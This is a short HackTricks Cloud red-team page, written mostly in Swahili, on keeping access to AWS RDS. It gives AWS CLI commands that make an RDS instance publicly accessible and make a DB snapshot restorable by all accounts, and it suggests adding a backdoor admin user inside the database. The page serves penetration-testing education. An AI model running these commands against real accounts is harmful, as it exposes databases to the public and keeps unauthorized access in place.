AWS - RDS Persistence

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

RDS

Kwa taarifa zaidi, angalia:

AWS - Relational Database (RDS) Enum

Fanya instance ipatikane kwa umma: `rds:ModifyDBInstance`

Mshambuliaji mwenye ruhusa hii anaweza kubadilisha instance ya RDS iliyopo ili kuwezesha upatikanaji wa umma.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Unda mtumiaji admin ndani ya DB

Mshambuliaji anaweza tu kuunda mtumiaji ndani ya DB, hivyo hata kama nenosiri la mtumiaji mkuu linabadilishwa, hatapoteza ufikiaji wa database.

Fanya snapshot iwe ya umma

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

HackTricks Cloud

AWS - RDS Persistence

RDS

Fanya instance ipatikane kwa umma: rds:ModifyDBInstance

Unda mtumiaji admin ndani ya DB

Fanya snapshot iwe ya umma

Fanya instance ipatikane kwa umma: `rds:ModifyDBInstance`